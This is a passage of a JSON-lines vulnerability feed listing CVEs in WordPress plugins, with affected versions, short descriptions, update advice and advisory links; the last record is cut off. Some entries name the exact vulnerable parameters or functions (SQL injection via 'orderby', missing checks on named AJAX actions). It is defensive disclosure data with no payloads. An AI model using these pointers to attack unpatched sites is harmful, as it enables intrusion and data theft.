{"CVE_ID":"CVE-2024-11840","slug":"unusedcss","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The RapidLoad \u2013 Optimize Web Vitals Automatically plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the uucss_data, update_rapidload_settings, wp_ajax_update_htaccess_file, uucss_update_rule, upload_rules, get_all_rules, update_titan_settings, preload_page, and activate_module functions in all versions up to, and including, 2.4.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings or conduct SQL injection attacks.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202982\\\/unusedcss\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202982\\\/unusedcss\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c8ff4ec-9b40-4d59-b3b0-382f91042a4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c8ff4ec-9b40-4d59-b3b0-382f91042a4a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6750","slug":"wp-clone-by-wp-academy","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Clone WordPress plugin before 2.4.3 uses buffer files to store in-progress backup informations, which is stored at a publicly accessible, statically defined file path.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fad9eefe-4552-4d20-a1fd-bb2e172ec8d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fad9eefe-4552-4d20-a1fd-bb2e172ec8d7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10247","slug":"gallery-videos","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Video Gallery \u2013 Best WordPress YouTube Gallery Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the orderby parameter in all versions up to, and including, 2.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179387\\\/WordPress-Video-Gallery-YouTube-Gallery-And-Vimeo-Gallery-2.3.6-SQL-Injection.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179387\\\/WordPress-Video-Gallery-YouTube-Gallery-And-Vimeo-Gallery-2.3.6-SQL-Injection.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-videos\\\/trunk\\\/admin\\\/class-tsvg-list.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-videos\\\/trunk\\\/admin\\\/class-tsvg-list.php#L15\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200979\\\/gallery-videos\\\/trunk\\\/admin\\\/class-tsvg-list.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200979\\\/gallery-videos\\\/trunk\\\/admin\\\/class-tsvg-list.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5524582-5aac-48b4-ad67-7c4829d63ed0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5524582-5aac-48b4-ad67-7c4829d63ed0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36754","slug":"paid-memberships-pro","versionEndExcluding":"2.4.3","description":"The Paid Memberships Pro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.2. This is due to missing or incorrect nonce validation on the pmpro_page_save() function. This makes it possible for unauthenticated attackers to save pages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368689%40paid-memberships-pro&new=2368689%40paid-memberships-pro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368689%40paid-memberships-pro&new=2368689%40paid-memberships-pro&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74553a4-0ef7-4908-a2e8-5e0216f7b256?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74553a4-0ef7-4908-a2e8-5e0216f7b256?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9595","slug":"tablepress","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The TablePress \u2013 Tables in WordPress made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the table cell content in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffa3b85c-7d08-4f6a-889e-b75620f72a1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffa3b85c-7d08-4f6a-889e-b75620f72a1a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3165531%40tablepress%2Ftrunk&old=3149006%40tablepress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3165531%40tablepress%2Ftrunk&old=3149006%40tablepress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9653","slug":"menu-ordering-reservations","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Restaurant Menu \u2013 Food Ordering System \u2013 Table Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'action' parameter in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11ccafd9-dad5-4b7d-b913-7821dd52d12b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11ccafd9-dad5-4b7d-b913-7821dd52d12b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186456%40menu-ordering-reservations&new=3186456%40menu-ordering-reservations&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186456%40menu-ordering-reservations&new=3186456%40menu-ordering-reservations&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4262","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.28","versionEndExcluding":"2.4.29","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 2.4.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/812cc8f1-f89e-47c4-b029-f6a3dbc55d70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/812cc8f1-f89e-47c4-b029-f6a3dbc55d70?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088562%40piotnet-addons-for-elementor&old=3048934%40piotnet-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088562%40piotnet-addons-for-elementor&old=3048934%40piotnet-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4432","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.26","versionEndExcluding":"2.4.28","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.4.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f65a7df-acb5-4b5b-8867-986ce9930e3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f65a7df-acb5-4b5b-8867-986ce9930e3f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-before-after-image-comparison-slider.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-before-after-image-comparison-slider.php#L195\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-table.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-table.php#L195\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087322\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087322\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3996","slug":"post-carousel","versionImpact":"2.4.27","versionEndExcluding":"2.4.28","description":"The Smart Post Show WordPress plugin before 2.4.28 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.4.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4035e3f9-89fe-49e1-8aa2-55ab3f1aa528\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4035e3f9-89fe-49e1-8aa2-55ab3f1aa528\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6947","slug":"foogallery-premium","versionImpact":"2.4.26","versionEndExcluding":"2.4.27","description":"The Best WordPress Gallery Plugin \u2013 FooGallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4.26. This makes it possible for authenticated attackers, with contributor level or higher to read the contents of arbitrary folders on the server, which can contain sensitive information such as folder structure.","recommendation":"Update to version 2.4.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/pull\\\/263\\\/commits\\\/9989f6f4f4d478ec04cb634d09b18c87a5b31c4d\",\"name\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/pull\\\/263\\\/commits\\\/9989f6f4f4d478ec04cb634d09b18c87a5b31c4d\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68420c5a-4add-4597-bd2a-20dc831e81bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68420c5a-4add-4597-bd2a-20dc831e81bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0808","slug":"houzez-property-feed","versionImpact":"2.4.21","versionEndExcluding":"2.4.22","description":"The Houzez Property Feed plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.21. This is due to missing or incorrect nonce validation on the \"deleteexport\" action. This makes it possible for unauthenticated attackers to delete property feed exports via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235031\\\/houzez-property-feed\\\/trunk\\\/includes\\\/class-houzez-property-feed-export.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235031\\\/houzez-property-feed\\\/trunk\\\/includes\\\/class-houzez-property-feed-export.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6fd866ac-6094-4f76-9fba-69494381214c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6fd866ac-6094-4f76-9fba-69494381214c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13513","slug":"oliver-pos","versionImpact":"2.4.2.3","versionEndExcluding":"2.4.2.4","description":"The Oliver POS \u2013 A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.2.3 via the logging functionality. This makes it possible for unauthenticated attackers to extract sensitive data including the plugin's clientToken, which in turn can be used to change user account information including emails and account type. This allows attackers to then change account passwords resulting in a complete site takeover. Version 2.4.2.3 disabled logging but left sites with existing log files vulnerable.","recommendation":"Update to version 2.4.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oliver-pos\\\/trunk\\\/includes\\\/models\\\/class-pos-bridge-user.php#L373\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oliver-pos\\\/trunk\\\/includes\\\/models\\\/class-pos-bridge-user.php#L373\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3234731%40oliver-pos%2Ftrunk&old=3056051%40oliver-pos%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3234731%40oliver-pos%2Ftrunk&old=3056051%40oliver-pos%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf6b7d8d-fb13-4eb4-b0b4-d0a10ad2a21e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf6b7d8d-fb13-4eb4-b0b4-d0a10ad2a21e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0804","slug":"clickwhale","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The ClickWhale \u2013 Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via link titles in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219341\\\/clickwhale\\\/tags\\\/2.4.2\\\/includes\\\/admin\\\/links\\\/Clickwhale_Links_List_Table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219341\\\/clickwhale\\\/tags\\\/2.4.2\\\/includes\\\/admin\\\/links\\\/Clickwhale_Links_List_Table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf41b5e1-610e-4159-9325-f7a694380050?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf41b5e1-610e-4159-9325-f7a694380050?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11327","slug":"clickwhale","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The ClickWhale \u2013 Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickwhale\\\/tags\\\/2.3.0\\\/includes\\\/admin\\\/links\\\/Clickwhale_Links_List_Table.php#L384\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickwhale\\\/tags\\\/2.3.0\\\/includes\\\/admin\\\/links\\\/Clickwhale_Links_List_Table.php#L384\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219341%40clickwhale&new=3219341%40clickwhale&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219341%40clickwhale&new=3219341%40clickwhale&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96c5836f-6d33-4a56-b30b-5e5d95b81b6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96c5836f-6d33-4a56-b30b-5e5d95b81b6b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0764","slug":"wpforo","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The wpForo Forum plugin for WordPress is vulnerable to arbitrary file read due to insufficient input validation in the 'update' method of the 'Members' class in all versions up to, and including, 2.4.1. This makes it possible for authenticated attackers, with subscriber-level privileges or higher, to read arbitrary files on the server.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245711\\\/wpforo\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245711\\\/wpforo\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cd8ffcb-0a24-4e0a-a9f9-23501742715f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cd8ffcb-0a24-4e0a-a9f9-23501742715f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-35770","slug":"vimeography","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Dave Kiss Vimeography: Vimeo Video Gallery WordPress Plugin. This issue affects Vimeography: Vimeo Video Gallery WordPress Plugin: from n\/a through 2.4.1.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vimeography\\\/wordpress-vimeography-plugin-2-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vimeography\\\/wordpress-vimeography-plugin-2-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10903","slug":"broken-link-checker","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The Broken Link Checker WordPress plugin before 2.4.2 does not validate the link URLs before making a request to them, which could allow admin users to perform an SSRF attack, for example on a multisite installation.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39027390-ce01-4dd5-a979-426785aa7acb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39027390-ce01-4dd5-a979-426785aa7acb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13662","slug":"ehive-objects-image-grid","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The eHive Objects Image Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ehive_objects_image_grid' shortcode in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ehive-objects-image-grid\\\/trunk\\\/templates\\\/eHiveObjectsImageGrid.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ehive-objects-image-grid\\\/trunk\\\/templates\\\/eHiveObjectsImageGrid.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230975%40ehive-objects-image-grid&new=3230975%40ehive-objects-image-grid&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3230975%40ehive-objects-image-grid&new=3230975%40ehive-objects-image-grid&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/638d8ef6-dab0-4cfa-8ecc-af2ded3c6d79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/638d8ef6-dab0-4cfa-8ecc-af2ded3c6d79?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10582","slug":"music-player-for-elementor","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The Music Player for Elementor \u2013 Audio Player & Podcast Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the import_mpfe_template() function in all versions up to, and including, 2.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to import templates.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f66cdcf-cbe5-43e0-ad18-c2b9c4491ed4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f66cdcf-cbe5-43e0-ad18-c2b9c4491ed4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3186359%40music-player-for-elementor%2Ftrunk&old=3174807%40music-player-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3186359%40music-player-for-elementor%2Ftrunk&old=3174807%40music-player-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9769","slug":"gallery-videos","versionImpact":"2.4.1","versionEndExcluding":"2.4.2","description":"The Video Gallery \u2013 Best WordPress YouTube Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179304\\\/WordPress-Gallery-2.3.6-Cross-Site-Scripting.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179304\\\/WordPress-Gallery-2.3.6-Cross-Site-Scripting.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b57c9e58-64a6-48e8-8ef6-25608e4131e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b57c9e58-64a6-48e8-8ef6-25608e4131e6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4353","slug":"wc-dynamic-pricing-and-discounts","versionEndExcluding":"2.4.2","description":"The WooCommerce Dynamic Pricing and Discounts plugin for WordPress is vulnerable to unauthenticated settings export in versions up to, and including, 2.4.1. This is due to missing authorization on the export() function which makes it possible for unauthenticated attackers to export the plugin's settings.","recommendation":"Update to version 2.4.2, or a newer patched 